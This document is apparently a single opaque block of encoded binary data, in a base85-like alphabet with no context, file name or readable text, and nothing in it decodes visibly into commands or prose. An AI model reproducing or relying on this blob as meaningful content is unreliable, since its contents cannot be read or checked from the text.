zdV%?zYBs%n=rXSmeas?ZB_bL6<>I;2WwpTH&rbYvd8?Fqzif7O?M=(qw^e5B#8);WGYE2mn2<5lBp-jc63Y4D5X!5{Yv z4z(?}K2mS(+hOfD(jT^6T`fzoEk7vT44d-p;~Kz^C+#7$MWsvV7Y0idaV)JnBwV!6 zA&M-PQ0!#E6#pn<-^cX2O_FG#=s>MuLrmQ)l0ajnG?x(`VVgKZ_R6(22el>Uc0cST z`ECQ;>p9)obRRa9zhEHmhomtsFJ-qocb!82*=M%x3B0exP=5h(H{L`s&WWe33y!eRpXMz3Gib4W z0mo@t4YkRy7!60+eWB#AP&xEk=gAVf@y#3gT#zIVeZ-z+HuxWMkZDE-p`}J72;j|` z%6AyB2Av^IW5tPqRf*{euAom?44%Wm<(Ho>kglZ7*cmsw67otx9Y5W+K;4s9gED2YTDh;IQ3zC=| z|2tuiE(hT_ELDu#OaWbT5@O7?*=b_((-`7ej<|AtIRLD%2I`rh{F-4%MT6zoZr0HZ z&2d121_>;rE9f!}qK7d!*6}b957#0kJ`SMn-jGKyWjM?Te$cxYgIj$z(M!$;`}@A2 zJZc7=*^|znBOaOD3--rNU()d-FX;~*?T1xc*l z^0=f}AmsiUP-hSBs5>fBUn{?>G@wF^xC}2c^TF^$^&!?-0fuv>zH$M5DHQT16ofC= zSL_AL0?fFMXFEhKj4Q-wTfKfS;tNfs~gUWx=fxD0jxsX7aGAxI|<2;1SPM~C2)|}8#Xgs5B-mFNLR2#^zhEMi`F4L zk~l1~0(cqS^{y1ca`*%8&isPWirSx}n8}%%= zdQ5-8VFR*tpM5 z%_f5}N$$Ud!5W*T_!bZMS;mjjcU|mkB!VSAPEm=rmqWahpwdCtd=He4fQc}CZ{XlLM0}LnY%V)-i5T>zzdW6V3@q*`Z#V&g%h0!%} zGLdOu&CKe{k@jY2bC{ZR2GScO$N`J%?&*yoFZ=k-T|xV#pc*%C%v!RLRQ=!~mZmyH z@sV7fQ4nsj2(PH5doXKhkH%|hXkxQBsbJ`Qdy&^OBi0QPY-9@YfmLz+#&=)u(VGl=vv5g|9@xE- ze?2QjsHvlXIUzKsv~Kvf;41|)CSgzI#zA#=vn|K_R%uMLMu`K1!F96?30)sS+L-0! zeP#M6W|D#Z2x=H9LE@k~(aq8yL4|;|AmSMk_w-2xAV_06$}@3m;NboolTa3k{@QVY zWq<&0Tn5Q%iE{rU_PFI*+&;OrmANU9GG^+XYXPnR4EKMgTn@nd`ORod(nsc(a0U*+ zBsJzw-^^AnU>cO~y|1Xv9ky= z{Hc!_H5Xj`kLr>}b3H9u{EcD2V2GX}Ash2CS&T2A2g479RR)lZ2uGZ$VQlp03h%Jh znP3y{k=3)^tY;5-7K0(7A1d?0cN8HKnD9G~!fOuj>vn`Ud<(yKs=wYiM`t(uzV^un z|GF9_zGz#Ve01vM;{ylK1jRhmO6J*Z z2T%3~L=05P>fTh?7Tr@^%MKk_?K*u`s6Jv?yKmrI#Mr-8wN%@YywBQ2;jbD<c@kEf|3G|E(b9ey z2bT#+Gv9U^qD_wi*Ff%r~c!gmgnM(KK!((`)U3w8q-2UQ`1p_U-fcltbZvTcI>hVv_3o%C2%kP=k<7k z8@#s|?o?g8OhsSK+PI2YliiKi;vx?n+%!V9RZ-FCj~mywH(K1_TEwf%;~P%ZxgNZD zZ-tx(*O9LIS82TLyR>k(lfr12@ZNfFF)5-MH zRpm?%$*m(F057#fEpGZzpiE*|Pt|yYyy^?9w$;__ggt6p^x-HLx$>(^#*#vmX(WFCV znJklEN!uHy1<8c+ZT~vZ#rf>4{6A(3$)$BE1-8FfbxaopP>oC8A;OdGVy}lzfxK!yi-Hb&`sIB{i7rJeUXS;VC`$viE#zbl#am z=XPRjla?EQUrGF(udtgC^=BF28_pNKb1=DHC$aV3@3Q${We5MH&!6U$iCzv&yf~jA zI}RRDOD=f&EB;(^Tz;xn3v8_GOzr$8&vWoEdvLdh_q#VLC$2Hw6_I@6aq?jP-(|0~ z>g|mvAkFkeN^}0%tI=mKE1W%Cw$rZm_a&VF(>c-k$7dg%PhOS$U74RU6_vX27A!sZ zZ|2~6{|`x9yuYu6(#|RTizC3t;Ry7Rfv|n*E>)LUFv-|*cUQIq8Y8W(85+FUohxIY zO?gmoxaXphZIPzW3of+;@v!dDD-$ z*NS#KI@Ol>7A9MG~MjE}j+fn>urZf?G%mx+n+D_V8 zNOC54a($_$*z3WmuYZhIC-0xgw|Ltc{-Lts#OcxxYuu=Nm%C+>&$=fbp3x9pO1)ej z7rvBaa%}FV--B-@KJa3`rIJ&z?57z&Ya{Y_Cb_Od&|yt1LL2T4)4+5oj<>R ze*expNH?Y$dx`-v+ogU>Ai@ko&}zmx z@?r+5W*}VfTaC@&zby>kwd)Z#SoUjGyMEE^k9zG%eq^wrM}QB$!msG%hs%{IfA-zH zmSeX6){QGE`)}X6-M0VE-L^mb>zju8Clz^@e}~nO$gLXpp8WZv(KtqV0MMBi;LVUysjEL>|_9^IA=|{NWoJGBMz~>YSX8~pdHfWm~mNXhKXD}{oXX806^>Hw` z`uI^447cYY>$3(8b)%>@I9^eyU$3UcK8JWm_agSyTF41Kf!`Uig8T(4pTy`6_BI^H zVok+g9Zg!HDd;Pk`u?;O9FPrg1W31tf|S?Hu8$lfJ%%X=70qM!?d3$MWc0t6;McJC zk~aWHY{0tY$&WvECa8Qg3mRP`fCjt;tX;#^3f&#`)JFyQH-ST7NG%RiJU9R%up#J{ zUI4<~yWT1X?=$vLl8YSBNCQd9#a@?24-VKm{ULK_MU(hAHm)UZbQ62Lw2`1a7L(Hx z^G^kNPH`@9x5lj|=X3SHTzS`>%P-%qXbYa(zF>ZQm=TCLtdzB#LF`vA6e*!Y>;)+l zm7p<>#YF8n-Y1w5K2{KtM8DXT6=0X(bttfe4On>WSN|hj;stmpJr+n;Nci!vsqov` z5RIoe75y7RxTVxtB1l$f9YnE*id2+R0p)@$Hj!L>9vkT@MWnl67co#GM~^U0cfl#s zA-O9j6cwl0Eu>5H#e-r5_Ff5yE|M(+gRA@aWKS}Sngnye=x$&Bym7|M;8ny>Q|DKA zlL8^aHQJuO!{8=SDHTKK2XMV|c%qWXWOv{k0Ei>FNGun$XD!H(ky7N-phgL@lmh>} z(dF~z(xFfsfTsq-_*HxD^>FZ6&s0d+~VN(;2aUM0!2R}Cmh?;{u&nBzQorzXlF6Xg`ov*o$Lu2L8n-9}s0ALwi= zhlF?ovqA;S5o@kWCrhaJ6OO!j7PvHp1t^lK3vQ+*#9Ti0v_eUC?unlX=i?QcC}ed7;dginaHZfw*Xo31z6;;a*20ToVy!pQO*YFD z+Im63R?_lWa=evUw9y>6k8Chfx^VIJt$wo3U?4wm8ImgOjC>I&1+4Zne|#;`?*lt0 z&XC15zKj(xy@8*vl{fn#_?rCcy5o@H8&+-CuRn%}6o0@}KCyNJ4Wjt`uAoyMlyJdph-q5Y$l<-CjWOtwbyqMo@$k!Th=a z+^}aj8H{%nF^Gq#Y?GlA7fm-Rj$OI*OFq@ySg|0z;ArG)*VpS_QZ zfyXoUp@>&W5WeyrqrM(X5E&fH!T0ruCU-BFk_>9;CXthd|1tzrd%-1)M)7J&bd~)r zZcfNC{Rke8>qG`&>F^{vrm2e3QT1`kl^@#wHHJg=@5PWHhGIlL;3~G9u7jvfACf_v z5*uSU!kcr;34lfH9s)xSu4$EgmoEReA6nuiF~ZsG2G9T8nRwmwgPr|NIl9;_QS532yDyQ`i|Ec`wjSD?<%rG9<6#G#nfCfU< zbKc&fe|F?(^JM@n9Dxn`=3TnE4^ejShl*gB3p4dQy?x&t`A#|pcT~0pfpHsTtQ7IU z>0{Iw4vg!HEjY&SN0<7|0f`X<+~v(v7*d6$-s`iuF+^?Jv5T!-R?cf-tw5jFIhce* z#*}=iT{?zD;|IW)7@|%R@jU3Vk@K8j44t1WOt{jsoPCo5-Rq>r(qR#=_$MW4&4(mv z524mT5;HysLlSJJOf?j&fCr>;*9H4!NcI#^hYB1Kh?TqPRwNGBJ@Q?g$nW7hx8RDy z`f4}NkuFVxkB9hPVeT882QPojs|oXdq;hCr$w3e(Ul6m=K4x=?V;>sPO6f(E$F|?|2yfE7yiio&Y#ba^aZILRfF=Od+0oHU$}DaU}qRs<>NDTK&{D` zZc@t{wsSvO1HdQ2VEl==|ETRXRMU?RamnsE-aNG=B%e^rF_!5p8X#h+^8)I#^3V(! zfG!qI$51(<01@3m1hD1&+jMqm**-8wB!uznD^Z}4BqId^EJ$6QfPm}l%%S8I!daK&SCh~0nT~w}c{^9& zLJEompn4>*vzvCG0-+=z^aM(?R{)@k;3kEmIf76+>PA_fUEc#07JR&FpA=vuMl%hN zzUnzCyDn96Di~D3UHT!8j^yF)+uhwwxGsBig}P5$(2Q90M4gm#BfBP4Zx8##@L9Ls zPnN&BE60&Mdi}eThyE^kMG*KlK!&E=Hu;9}|4jzv$_S+sZw>c8xL@jY-^IrK8J@`GPN5A+efpq{Z7z!IYp6bm^~#j zig^Y}$KXH+ILz)gAQHbXO_3q)Q7JyiEH=JH83&~lGR*Did^o9;Fg2l7T^hi=>Hp%& zQ7H@R=M3vH*bJ}OK#cf1NXizRFKGxd8FYQwIaVs6_bcWn*lYq$#@k$C2k{Kg?wNi`g#=Y1yiEor9O~veS!)YB1W*B)5 z&$0X0pDZWCgf+-nl-u9h1D(2JprI~jV^-Od8U3Sg8p1%emyydWFkr4Rc@72z8&kbM zAC^MzlgC8f#Bx~Ur|F-M$LMu@tO4s~CPccH5cyqM+GV8~!U{s4#sN*>%MmHVaOL#v@@Qrdpy=>1z}-jOiuDD-k+=8`Veik0w~D`b6^!k@rwZ2E{k*K}1(m7@ z*W+33%wZvH`rkA#wA|&15m6xzp%k-sFVka&qj$Ozbq&FIJQM8gyh7+v+}%%9umWDh z{iYKS9$Yl{qRU1DW)^fj7ObofXi2e5(wiyu4AMQ2&A}d#(0C<7veNE@_Lt4Dz_lm; zx!w2UEPrZtd6u)5%=wAlWLXelSE(i&M@^Dg?z}knbH45e7Y|l%D2k2Z4#z8`T{SEm zJUQ^*GtsKcZZnIL;88~P$=`gW+v}y4W77BT-f^Qt<_Sm6C17uFdaFHjszyNL$pP~l zS@GcVcn*Ho@aWSVny68bY?fO)!pUUI|GJTn?c2cA4gY6G2DJBTB?*V39=R9usDTHA zLaesj)xgSB!_ewS9v?P+u0P6IH41Rhxlm$6Q!|cy`zW%wKWORUsqe;7zaB+7yn6WF z-EYU(J0AhXn8d1?#GZTZuJJfd?eWQjk7EsbBjz6^1SYa-9n+;A#wY$dbq11jFfr+j zN%GIF=(5Db@0-cj6Ft04PIsB4&YwSRg-FyfN}4xG`|vpJdt%x-lXFXnv0r{g{Ys32 zw4CLcFx6TZXROq8A2KzP+}jgVT?iS~Pg5l~A=qtJ6ybbg%lUJJtn&oc1p>n%DPym& z@?aptJj<=PzEc_$jDbfTvXdkdSFs2xt(_PSE+9+!z(%2pylGB-$@@@Qk%h-%UUm2n_j7Fy>id= z>f_d{U8WUJTPwy)E8n(O&YM9FtS+&w?wr}p^KCct&2E*o-KsXbUDtN|p4pwpe{Nr( zBa#p@9vnET?C!i-!-uwp?`HRYwcX>HHNx8)g?1i_oVj<7Bf;*bvb$BWP#FvJW{q|i zi*}m`a@%&^XIgc5<{f8t zI>yd)D5ST)+G%+Pd3YiHiB-GTM!Q!|TUMf5p(|Pjhpyh<^lL;5g*IrLvYn%-V zeDWsB^6je*iFnJ&^G_xn&c4cjGF5H)_MGMPJuVIea;lZ-T7l!T9r*sgCRVDBCpzfyktGOJ;#JfL@baIt56V_J$xOG_#J6 za&!Vw#_`*(0hDafeV)xp!pCeb%9@_u*cJ|^7Ao6aGE6QCW*-qhsk!T}ff>$u=y|2K z^+L_FBEzoQh0te(jwM)K>-5r(5abPq%f<UPHeTP@2SEIeh;^ zqYNT<-HH~sHrkp|#!^SaL?OOuW=8NCx?JbOG`TaUzrJfte0!=aXfErl*G1g9v{G(o zd4GQ3itujV_WH_`dr=Ctvr%7-1~y0C8d~|L)f>P|LH(S)lsCTHbHsIxA10jZfb-6Z zRv{U5x)$_;?|j_j9(3BRSz*lU9Z3e>p!Zjgh)}Ngi8w8D`lTaL(Mk}cJBD`&%G(hh z#ARTMsJXk(nuuD&5q2+sY?@wG~Yr zycT;Q_sdn+i?tE~VFH?2PeU?7JZF-6A631n3-mxslX-OhDk$J@9~^Vk*A-o9QSOQ zuSl5lF^>|jo$T{Rj-bVV)H{M?F8aYUp7Ti^qtZpk6-!F_O(mG$HL#S7a-Dd%}-ze2bG zGE4mra)ti>k3!<@;Ld;I7^ZLu7yA3*!(l%ROL~IKXL_?6>VAi@W3B+R^CpW{tsM+M zv``x=Ne*2X%FruWK!tfXi_f{9(cYavoSd{$_=m|NVaxudj)Rrug|oHj43Vnk|M9NwxR26oayr#R1Dj*Oz+fvFbd$yx zxJDA`m~vJa=ajMsmn{}b`Iv(>xc0{P2Yyevockxr2E7i!rMkj&KLXc~hi{@E?Xy>` zC&B;(9q`iQ?% z$PizpA$`4j^2;7vnaG@0_K?Qki&yFvrOKz9;Z8h+Ovh~5lEa9pP{ z#({@-SF@DJO&9$8K#!VAzea@l`o5c!c-;E>>#5{-zVrViTDrx*MQ8i^Ey+u^4juj$ zd-1P zTNYADB@kJZc-QaO-#anagfsULx5RR~kQr}-1ppkl`T|8t`#wy0T(So_O%~kpJt`1b zPW}6wDtu-SD&q)T!}5bnrIU+bCM|rzo_cUL@hGZGYCumSCsQw|50{h#c0hqp1TIT1 zjtwKaG8~;F3X%5+J))P^i!RSBUmV|7(vo62c+mzGMsQHe13jp{aku;ieXt>PjaBG4 zuN7T066X2y%GAtplP>Aem`gt^Rw5u~%BFBl8VP->4|b6EV$6>VwPi;XN?_dgqNv@* z3FA!YZ!SW`*bYr-%GR5oqMR7m_|J4U%;nsXjAXven+vN@mHGmhXDGN*O&9d%{$BEx z1{R$j&*U$sqI`&8kx5P_&;P_xq4YOYk&@_ixn1r=%t906k@NyKmmx}NF}#&PJK-KE z`)(>P4tAUyE}lt*EL3p>Mwh|jIOcOx?tR8_&WT8e9069=Gbo?i_mneNtwbBa@Zh6S zXYR>RvM^xTD;${Mq%XvoW*~5%9wjc{4Ff&^2vrpt4U;$i zSs7CfQ5=k6xH`}O8iqh$8tY%Sy$dnylKo)%wspFe%@k+*Mv4rAG4$~-1~Z|2-ZTSw zJR7Xnmmz9-u9z&Ed}=D zSj@HPcr|Yx2zlpp_q%7>bh&yTr1e{lAbbIg-bVsUonRIGD)^Fres@S_9Yl!1Fr`t~ zp59rF^=mvZ54FX=f7P%@1q(=dwKT)$RIn{kAI+x`Ps-441h-Xk(lsrvy-GaMD;+E> zxi7dIwp=AF;K@mE*#Hnnb%jNvahaYM7)Z6~2e+1bz^?;&i*i>$B7FDKzufuv206{* zFUK*&fex_C_CJY<8EF2=8JM?g5}S=<%+>9pf~24b!Z@q$gSkK>Aawhpz;R%if>w^F z|6l^}OyDJ%cGdU-gvMU+K=7+7Z5;nL9r10$Y#d@6iMdY~jLwIs(goKzFw{Nb76-5K^PC*Ge;<_SnGL2)Mo+_LeKwud>OVj`i_qwI7mZ?2V>HRq!iq4 z!(DI-jz4l48h;VKP!B%sw6r$56olaqjeJwihNnltczKXU4y=kTD3T9xCVu*%h2-VK z@N_|@)(=eGvm-cY9vhxSx$*4&pOdOB6kNMR|L~ZSXr!fR##vyy(JQXY!34FGF6?G}NLX*dCq;5{mc0D%jOCT3t)MMOFLgLITf zWJWX{wa69qb^m~22&!^XbO1^KA#Dm5_{NB}biqYoiXUew>7wAo3ra13aMyg^h!YrZ z{95wD<`ErLz?NN7f=;pp3Bf|!dV*isy!a-tA5qF{6L%XoCucGzD`=AWAfFB*z z#$7iC3u>#8ifF^9=_PpX1b%%Ftp<~b?bOy)3jU^8C_;g<(ThqTFtA0y@m+eM2jYMO zUr^#{Fg``W862Vj5Hm~PI0ZHFe@QTPQV6+*^q>pG7C|r|M8iuWk-pCystyOun0@;q zmW~P)9f}Z|Z^H@L#Mnfz1vA}Ar~-L`J`2%P0uB1m!D2`YPP;IIZ}lFJ(C~(EiXd2v zOy?jmB=9s2hK#o~4aV>p!c0#IPN4+$62}(-fs~g-#E{ukK2qWVoLYcVcSk=d5D*&A zB-G}s0&p-5&ZNV6*hUzCHbiNEkE5v3KClvrvd8^|@aV5%_i? zCg=g&VuLUr|2$Yo_zG9PtMKD#K?EJ`9MnW4kPtJCRVu@SJi1 zQX2#IqQQH{#f)h4MO^<6aWJN+v#7*Sz}~SCjbOfnc{rm!;{+(LZGzVSWtO7C8?8#% zLCDg#BHy8&9D&VdE4Ikw;v&Cgf=vpb>s6pZx@&#-!G`NYp5`U1G@70ok^c%&qLu?w z+O%SDwKPOkitJ%v9FRnZP@Ta`On8Yga9|Y=W%xKz1OXhX9Iyq^VI}(7{11s9z!sT! z#1ywWu8C}ZO&Q&EoB$A?X?yGu@cX>Iro>Se2eze-MdU$vM@k{nG%?d+h)0nqp&RMR zMTP^&KhNMQi^Dr#;_tXL2G z>NSNOr^uqC{_OoVIWT7+@fR1BLX<5W;ciEP(b_X;H0ARef=J_g@0nCrWEFr*KA(8% z4rVlf?cuci&2h^y{4h3K!pp7)e#$W%LIfisvhi;4VU1MKUh%_8JzR|9LDOs%K?J{5 zD`X#l0b4Z*`8A%fKa%I(N!Z(oA=-*j9rUqGB4W4{V|=P)koKBM6JyX`pXRJF>5LGa zXLuZxT#8i1A)1R~t-Lev0P+-CDCM~m?|iAC`?}3)I@PEPORxNC#Hxap&`#He#c?%b6pCGVB6Y`!^v5o|9j+BL%k__2`wPR&xeNs&K zzTBy@GS_z>irW}6=r9{Tq(8Xy)#6O&pCS9<= zP-qZ1>Q95U;gk?wNKYb!aMU5n2^qu|yiFJKB#H(FmAG7?vw?DJ0?FfwK)E!9O!E{B z7CKJEXW}jn`J{^Dq47t;lZoo%zm+!F7${rRu8mmFR$fx#TXquM&%ZUtZYR7n8_idu z5y8WykUSba@E-9v5VaJV3=LOzw(aMlQrOueVQO^h z2K@<7lgYa~MJjY;)D z#^YZ5dSen_Fdd=!yt(XZYn?SbkNB`R@xKo;_olp*rE&v<+m)4km7$Dw(Vh0L_SUDq zOm7+I13muN%~M-P9$uFnF$PaJUJWFGnug2=Mr6Bw%KDgs+g|&IX8?S=zF{Dm@&-<6 z**CEHUFSY(m+VaU_f_Sr!FJ(Yf(G2{Ll7D^HH@kjuw>JW6>0>6A`T-IM)M((Au z|4X&Xmm0G#b>vY&_&mH&io<%GlRgp1tkL;kP5{!VC-Z+X&g1omlAG!EpLtq2^UQMcg5~6Ei`3C~_(k8*U)Z@N|G5vd8^Pok z4&>*b{O5mF&hMNZbyn)R{d68)#TA(2&JUdPT-8EXEy&I-?3~5FK{4d37B%J;+x_s< zBXf##gXVKfCIL&J17ioPmL1X-=OfgcpD%k=t$eW=1p+c5D({cU_k?!7IxasHQS~bR zUuJY#f0F#G)PR2aztOCK$n*m}xoM*X0U720-XD@5b?o6gg3G@>_xYau|6R+EtG=|) zed&^4?G4BinSJh9)1V{&^;N*vb@RzDYM<@MWp4w%eW?0oDg0tyZbk4vC0+$b1l8fD zso3iqum)Ff`xc-?CJEVMpDhJJD`=w4zz^lXA8OSs}`&9E+7u)oY2>ztpI|UcKKk4gME! z^V@~_?fhy;n!@%$rwiw+m72L>1%ZF+<`>Ka??uY)lUj3(ieg{7HXW_zbibY8r;9{3cRI|e{skEW|;Bz9)ar9ZvyXys3WI$ zce;2x4m8Yg;rL_hMXQ*yyx8dc&Tx3fd5a>qGfHN?}F?>`TJj|S4OUypHGT^ z<(uPbIO$CQ;h&N)YV6%1P~p+;`a))%_p!ZjoHKKDys0sR7mzQ|nttsT-h)v5i#))`?qmXYpM&HV=BE3=8T2ZRhjcTfII7qQR%7ed3wq876Ta;xyL=ue)=R0(rIhAm- z?xnLs88M`%D)stf=uBJokzSIlC{ee^? zTy1xO&6(Mwmg_>rjp&a##yvMa@vQr~*_}PJH5sbQ8YK%k#lNsoxETM^$^{?- zp4;sB33nH#gx8*d{)Q4D+Vh0B0p|oyPX?74G5C*FUpze>e((9C$D)Yw(=)MSPKmRj zUC$Y))8C&b&Zp_X`{!qeqphc~eu_zpIXb-2q@|It^%DSSqu}woyX)7!kpBG;_FEhr6J{!L@M zdGZY+R;YpKEQ;nL<~oi6Q0ZY{DUsy@-s4_%d$)A85=E(!nw+nu{UVp7Sm!Hh`fCkc z1k7DU;Ei;V9AZpPM8x&g2qNSTRQM3@%goP-7PGFHD~Yu1^LWsk<+j;maas575OjwKDpRc+MQ?NR8* zQa{I4@2=JzvI&J#`SG1-G0+o~C1F;_J$ueIiG2Ua?h2 z>oh}q9Wrtzp1>9kXnq8}uF)NQO)AA53Yqg*5r&~1H*bGCw6Iar*hcc)yaQ>v?b!=A zYiKCArrwTTUKrjrISyA!F5b z>cn@=a&hBYpX=cUjtWcM@=LsdhApmQ;K)jM5tES)c%)}YF!&Ds=0h7!y*r;raK|mn zIx+k5Y-+jBnAPGfUT5-E>w7V8Rugt!T6}1BO)9)DVbk(yqRyWMtXr}S=N0qzufG4% zlSI07MIMR)ubN$SXg)H6A=kIP>tC_fD3&{H?N{O)WY(1!)%571RJPI3tW#+xii$Yy z=wvz6L*3|dIX1V|P$TQM`^Dz{oA!;7m%$kOk>-PYRK_X9?fq-sWEK_e8@IIIekc57 z^P$8SX*H@~iva)vW(HkmPjf*!}o1npVbODDPkle5A~b zwO*Zu2hD3WA=O|jSdo6V*jUr@h#9cJcKfR^+)|m5)}OU@YH~?*m`hQZDoBj}d1QsP zq@`ZWF%LyHv&zKvjS|VeRNVuW1tTBS&q9;PBL=WNV^6@p?29Za9tN|_m`Q-R@r-t;?EVJ#vI(%VO^+#Mnrtb5&%is zk%2_!Ftq(@Ct**PTj-Rrritb6H{=;!ukBl?g8RZ&-6rU|k4O+{^=3@N=WhS=X+eo4 zXuFZF=sLj@oj5(%fxWYI`-K#z%_r>Ny>r|Yrq9&OkNngHJb5p1I&jmve$#VpmJ7dw zYQE(_EyYMALr??>Z-uaDD$z80q;!~n__CpG0PC1qVL%o!mNDW~kfQ_!rK}+aq2O zG*clhgpN_xN^vn1f%W@OC_P*!VNGEnX$Ku+dHgskl)lRVnh{X00;7Q}z@Pz`ww+U! z`sV#Zb0jFe*iQ6uDUbAd5H!hI0MkwCY0A$O$v(CLBgrUihgHsd21A96xg-( zlxpGU&Rx%>sL7ANUfkTq)Ax2oFYeiu-KXIt+nGeMa-!^(T*;mNfo*t*%AjMCN(_7@ zD9uzf#RUwPfLkfxa42S*XqzT&R|W;W=m9#5g2m7Psts134ag;6CMSbj!ndziC4#DG z5&w}4w2KAqvLQ7Y5d#RNViJlY^d03BL4sW>@Jys!!(Y-a(5GODhlsI-piIQi5@m$C zz*?#3_n2Kdp&A1+D4fo}eH#=?ax0}<29zU`3OSYlF(SPGn{;0}@1YHU5d~yQ(|@;- zxGanf38N{+uu2TxKFOU7#bwa>vEp2Vehq(`V&~SwKv^n!3t~Kzf);FrnIe1=pt(?v zB6Bgf-$Os2Rn@NFG#5oyn-l)|bXMxagdVzX^z2|WKD z##1&dDgh{mV1GH+pR>uI0v;D}%|xhlB-IUpTUZ(laq;!7Fj)p|HHUAEz^oEX`xTNu zB{748cC!J=RIm(#vZo^p#86?3XSe4rh6}hq1!mDS?CI;*X<0Hw8zLl_vMWJk04CSN z_6QCzuyhkaiaw34A}C3wq8QG!2hu}D5H0hNO97fr(r#+skq&4!^nt$eLu5IMPSMwt zEU*_-HANd9q$qaY+p2x1MD@T3D2o9wB9$Q$ktkAWrmMavQ5}_lS2@5<8PHq;-Qoa@ zRDzY5WW^!eEm1{tRc+}iFOagA@4=^BU}Xxh+6!28PUS33iO^MjLOYTa2cSz-GPeUa z+0fD=Z6;70MnY-vUX~3EscmW4}VV?IbF+E(iiFgY0u$@FIvb2{%0SHWMM#YruCc41s z@;%po+)yS!eQAR#J24xTqudR#*!ymeDvbKulPf6I zUl&yiC2)lp8$+q?^{Uq7VrS1`%*4115?lemIrM5RJzRwd!z5wmwqs%`)&5+#LIzdj z!!}~vUL{9O4qY9A=WMH;#JE`lh>75}C}0JrXznLWwX3c!z$eM!uXnIoG!zrTIs>OG zBq&1wJw~lo7F7clD8GqDDAh@9OMAo90($kCLKGdr$wRB{o>hld@?6e?zl&-ZTns>f zL%2`|t(q=_&6InWqm=DI*>oJ{d~F2{wZX2YLZpI0Kx_%B0x3Hy1F#$*Wzi9AiK?0m zxLTq*L_7L*y=p}X@hqkKMgCC}N_8_$0oam=cPZ6qE-<(L2=UjJ*{eX6VMXDyvh7nq zg_PJVRjJ@W7;asK1Wl(^`?ImEV$s}Hm0vzJI}v;U4csn1Rw3E38o|v@?w$3itl(lc z7NgMTPtR_Llf$ad6yS3?7Z%%LtgqE9)^14Rz!f6UpHibKzMy7TjYqH%2y7_E`HG=p zTJ=^=W9Qwo3lV&j7*#=mJ&N&r#Wh3J>SrrapKYogfYSpdSYM>ZS#rFh1db_bNZ(O? zskqtTLbK68v+>7fQ(}vmeT%#(E$o4))&{f(G{Z^&q6YHyY-0w3b`ou1(l%+kWR6I{ zGzz#w_te*l19~eJsOch9tQfnu3(Mf`{C$DRwkg&0kHC;vJ#>iTjdVB{;B9HvO^UOY$R)( zQ}!2OWT`ylT;&vz7zwCJG+uCkmiaBjQ|InV1eI0912MqM?}UqKf>qnK<2jcv)NMGe zuX!U(L;DxR5^ZuKwQrZASnQp*uai#SDYmIE{ca7vV>Fm`wl(A7Y#R_4h`H%W(c~!f z+~ie6-bLae;2rPc=VG+RGc=rv&A(21bf-!8oUz@t4ezg1E|5Wivrxd*+!QW`$w86q z_i8QP7Av{+`Hqq01veu(6ixHn#np@9s9p!K{#?HNhu?Avtdn|KKLuTOmcWq1PuFko zBWhI1Iv4IeFy#$OL?xpMuzfRWT|XEk#SV+}iJ2Hp8g{`?9*>PaMNw@8%XYLu-60r7 zC@Myzw~PWih(UXf4NU|YvWeI9s#x^(ek3RwDJIJZ^%E%jB1_XaG?#;)!5q$}09%^GBLi2)Egj%6m1}#h7)tpdo|VP zE~%tTxM>Kygm&rcJZduy$8&-0DIWh$4|Q9*49#c3c61Zrz?V@BybFcU!^1ll(cB{-y@pcwqc`(MQRvhSojHw zBU#cZR?&1Uom~|t-=l=BKMcj(zP;=Gl0#Z-G)uncKlzo80@##=5pbUli?Ev{m=yNt za2>9^QEe9;chDA0r-8|&dt^5H!q4I_4W%p@6vaI$_yny14v=Z600a2n(TB~pFjLOE zhuPCe!*)m%M3ya9&H-L};{B*twCrdzTct)+=S#&#ldxz6^c@AGIrS;)j~=ljESm&3 zOUl{alh-0PIA=8rVL)7IPz(j&V6ra^+`@#t>|x3E#t@21ECPstY(7XoXEx_LGBO z3*fKTFpAG5i?L3k2M1qb{p9!l1Nx0swZcm_(509LAZ8fADr=@uB^xf3?~kQnu9ojv z_AftOiV2rsw$?OmpuT)-gN~74LfFHZT&0Z<6)uA|zvL+q>WQ4UF^-d^OBItx{`tr5 zN@JF$MToW@zX!gd;ac9K1Z>S*8Y%+8oyylgb(54Fl-3xjSvkXXpg0Fo;%9h#}x51F#QI3e_dzPik6L{+(2hu~R0n8wGLcZKq z>FIT5B>Q-hwj)Dh{o9ZId$Btat-tx$)gt2nnugTGlsdDO`ru`U*Hvv7Kn+oC8UTBx zsY7B?DgD6T&ma(SS52Btrs45TxV2t*^?neMBWKuzdlK-Zp{7U%4oQiJs#Ff$25%ts zOR%`LALNsI7?n2EmygHYfWta7t8bjgwOurDlfvD*si8E*S4U)hh*baSnlIER&@r<9yPUqL*y4uhB4V08#2G=-^Wz+v|In6n*Nu z%{YJ8GOl?7qUH0UujUQB_bsYvW9RBally`SGNiVq{m_{rkrVf3taKzT^N<4t%>oF| zn7B1`-4q!#huR8h`3PsFx5qOl3YH0+ii`-j2tu=H5V>uh* zPNDw3N1r;2$(FzjS}N-hyifwCNLo8w;6s{PH*RTv9)S6pP+?JmWyH_rdYBL2PG^zXw##lOj>e{Yihy!!I*i@IXwmNr`oEef2_ zVS~K&T)2HmF#~aZOJ}HCc%}c-7u9-Etv zI{EC}((G_`4|bvd&-td^(dP`^tT%p)Z?g5wmhI^m3Td}G0-l%EMUHK8_WROh zA*Ro&jfX8f0(|Y(w445FAz3`Ka+0BTUW&STt44o=T8nw>dKD7Ua)X-sV}jIaO^;#X z&C2r}^zijT+MRD7zrFIj{(~l?$%oxo(=58{BCGPGmPIzzLf0_cy4sd7 zn=Rh<`m6w1%VOtSuv@rGpXH@NSF7!{4)BxgMV;tRVYdFwzqmx!LY2(VOMcDuuD=Dq-`H{d8_t^OXN?_W;7RX z=$eacwccWXhTWT0gSJRMb2(pOT4^l^;GvoT#Q{sxOzq5^Rnf?@a^l0+wMJ(USDZ) zHNE-iNrQKnQe^{J>Uj#k@Vo-^$9`>wtKnp=dZ=G!uU<+=W}j(6eA;=`t&GoYiNlpQ zFD*s;I7U3aIlm$EL0477@zB1}&n-!7R{4!=xw*r+(tRQE#kKoK2Qo_52OLTn-5GLW z+YQyps;set|E-r-5+W8DeyA>ZG4rABp!Kiba|QoqQqSh=ZGY$RpS{k^#evLqFB5f- zg=|>;Iw$?edd$mdzx!Lg)?|%s@^3_cxMlpK{k?OwV(v!(*fPB%S4JR2@w4XWGx=Jw--(a~$2v z?ZHk94wB8MUui!;2ecM$D*7@Uq4Bjmq_zG-USRs``HFhF_dU`c+3%3ma<3rh{KkX6 z&84%^u$+PDl!PatgG@M zIA}+^@cFa2(iK;&=z+uC=YleI-6j3j-?RrN2kHII^@i!vfdlcid6jbOje`k^e~0U^?pN5W z3id7A3*qU9hL#rS-90)q?h!Meu!Uz~zk%{_+vNbYiH5kB2i1JeuK4-xag+73)&K3P 